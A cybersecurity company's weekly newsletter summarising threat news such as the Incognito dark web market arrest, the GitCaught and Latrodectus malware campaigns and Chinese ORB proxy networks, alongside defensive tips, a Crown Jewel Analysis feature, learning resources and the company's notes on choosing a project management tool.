Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Story #1: Leader of Incognito Dark Web Drugs Market Arrested
The alleged owner of the Incognito dark web marketplace, Rui-Siang Lin (23), was arrested at John F. Kennedy Airport in New York on May 18, 2024.
Top 3 takeaways:
- Incognito Market operated since October 2020, selling illegal narcotics online and generating over $100 million in sales, including 1,000 kilograms of various drugs.
- Law enforcement accessed three servers in July 2022 and August 2023, leading to the arrest. These servers contained extensive data on transactions, vendors, and customers.
- Lin faces charges for running a continuing criminal enterprise, narcotics conspiracy, money laundering, and selling adulterated medication. If convicted, he could receive a life sentence.
Story #2: GitHub and FileZilla Abused to Deliver Various Malware
Cybercriminals are exploiting legitimate services like GitHub and FileZilla to distribute malware, including banking trojans and stealer malware, such as Atomic, Vidar, Lumma, and Octo.
Top 5 takeaways:
- These attacks impersonate credible software like 1Password, Bartender 5, and Pixelmator Pro.
- The campaign, known as GitCaught, involves creating fake profiles and repositories on GitHub to host counterfeit versions of well-known software, aiming to steal sensitive data from compromised devices.
- The links to these malicious files are spread through malvertising and SEO poisoning campaigns.
- The attackers, suspected to be Russian-speaking from the CIS, use FileZilla servers for malware management and delivery.
- The attacks are part of a larger campaign that has been active since at least August 2023, delivering various malware variants targeting Android, macOS, and Windows platforms.
Story #3: New Cyber Attack Exploits Unicode Trick to Deliver Malware via the Cloud
A new attack campaign called CLOUD#REVERSE uses legitimate cloud storage services like Google Drive and Dropbox to distribute malware.
Top 4 takeaways:
- The attackers start with a phishing email containing a ZIP file that appears to be a Microsoft Excel document but is actually an executable file using a Unicode trick to reverse the display of its characters.
- This file drops multiple payloads, including VBScript and PowerShell scripts, to maintain the illusion of legitimacy and establish persistence on the victim’s system.
- These scripts interact with cloud services to download additional malicious files and execute commands, ultimately allowing for data exfiltration and sustained access to the compromised system.
- There is an increasing trend of threat actors exploiting legitimate services to avoid detection and the investigation into the scale of this campaign is ongoing.
Story #4: China-Linked Hackers Rely on Orb Proxy Networks to Evade Detection
State-backed hackers, particularly those linked to China, increasingly use massive proxy server networks called Operational Relay Box (ORBs) for cyber espionage.
Top 5 takeaways:
- Independent cybercriminals manage these ORBs and provide access to multiple state-sponsored actors, such as APT5 and APT15.
- ORBs may include a mix of leased virtual private servers (VPS) and compromised devices, including outdated routers and IoT products.
- Using ORBs poses challenges in detection and attribution since the attack infrastructure is not directly controlled by the threat actors, who can switch between nodes across different locations.
- ORB networks like ORB3/SPACEHOP have been used to exploit critical vulnerabilities in Citrix ADC and Gateway, while others (e.g., ORB2/FLORAHOX) have been used to target critical infrastructure using SOHO equipment.
- The complexity of ORBs makes it difficult for enterprise defenses to detect and attribute malicious activities, reducing the effectiveness of traditional indicators.
Story #5: Latrodectus Malware Becomes IcedID’s Successor in Phishing Campaigns
A new malware loader, Latrodectus, has been identified as a successor to the IcedID malware. It’s being distributed through email phishing campaigns that started in early March 2024.
Top 4 takeaways:
- The campaigns use oversized JavaScript files that exploit WMI to install a remotely hosted MSI file from a WEBDAV share.
- Latrodectus can deploy additional payloads like QakBot, DarkGate, and PikaBot, enabling various post-exploitation activities. It has self-delete techniques, source code obfuscation, and anti-analysis checks to evade detection.
- The malware establishes persistence via scheduled tasks and communicates with a C2 server over HTTPS to receive commands for data collection, updates, and execution of malicious files.
- It is important to remain vigilant about the continuous evolution of malware-as-a-service (MaaS) and social engineering tactics.
Top Tips of the Week
Threat Intelligence
- Conduct threat intelligence simulations. Practice scenarios to improve skills and readiness for real-world threats.
- Integrate CTI into threat intelligence platforms (TIPs). Streamline workflows for efficient data collection and analysis.
- Foster a threat intelligence culture. Ensure that all team members understand the value and application of threat intelligence.
Threat Hunting
- Implement a threat intelligence sharing agreement with trusted partners. External collaboration enhances overall capabilities.
- Share findings with the cybersecurity community. Collective insights strengthen everyone’s ability to respond to cyber threats.
- Use CTI to enhance threat hunting. Combine proactive and reactive strategies for a comprehensive security approach.
Custom Tooling
- Consider the maintainability of custom tools. Create solutions that are easy to update, modify, and adapt to changing requirements.
Feature Article
Crown Jewel Analysis teaches you what to protect and how to protect it. This fundamental risk management methodology has been used for decades to help organizations determine what is important to them and where to prioritize their resources to defend against cyber attacks.
This guide delves into this risk management methodology to show how to use it today. It explores Crown Jewel Analysis, its benefits, and how to perform it. There are also recommendations for tools to help you use this methodology in the real world and practical examples to show how to secure a fictitious hair salon against cyber threats.
Let’s jump in and learn Crown Jewel Analysis so you can focus on defending what is most important to your business today!
Learning Resources
Antisyphon Active Defense & Cyber Deception on YouTube
Antisyphon Training has released John Strand’s Active Defense & Cyber Deception course on YouTube for free! This excellent course covers how to force an attacker to make moves in your environment that allow you to detect, contain, and perform attribution more effectively.
A course you don’t want to miss if you work in cyber threat intelligence.
A Notion Template to Keep You on Track with Your Goals
If your weeks are chaotic, unstructured, and need organizing, this Notion template is for you.
Deya walks you through a comprehensive template she built to keep track of her $100K+ business and ensure she aligns her work with her goals. It is an excellent resource for planning your week and is completely free.
Not Getting What You Want? You Are Probably Not Good Enough
In this inspiring video, Alex Hormozi discusses what he sees as holding back many aspiring employees, leaders, and entrepreneurs… using bias as an excuse.
He highlights how many people use bias as a placeholder for why the are not getting a job, a promotion, or landing a business client. Instead, we need to embrace that we might not be good enough and be so good people can’t ignore us.
The Traffic Light Protocol Applied to Microsoft 365
This excellent demonstration by Johnathan Edwards shows how you can use data sensitivity labels in Microsoft 365 to better classify, protect, and monitor your organization’s information using the Traffic Light Protocol (TLP).
He shows you how to set it all up and bring more control to your Microsoft environment.
Personal Notes
🤔 Project management has been the name of the game at Kraven this week. We have assessed several options, including Notion, Microsoft Planner, and ClickUp.
Notion is our current solution for managing our content, coaching calls, and course creation. It’s a great platform but lacks some of the accountability, collaboration, and automation features that other tools like Asana and ClickUp have built in. That said, its flexibility and powerful templates are features no other platform has.
Microsoft Planner has awesome interoperability with other Microsoft 365 tools like Todo, Teams, and Outlook. However, it lacks many advanced project management features such as dependencies, comments on tasks, time tracking, etc.
ClickUp is a relatively new contender for us. We have used it with clients in the past and found it easy-to-use, feature-rich, and very powerful with its comprehensive list of automation and integrations. We plan to trial this platform over the next month to see how it holds up with our team’s workload and if it can help us streamline our processes.
If you plan on using a project management tool, I hope this brief analysis helps you get started. As always, have a fantastic weekend and maximize the learning resources, especially the free Active Defense & Cyber Deception course on YouTube. It’s great.
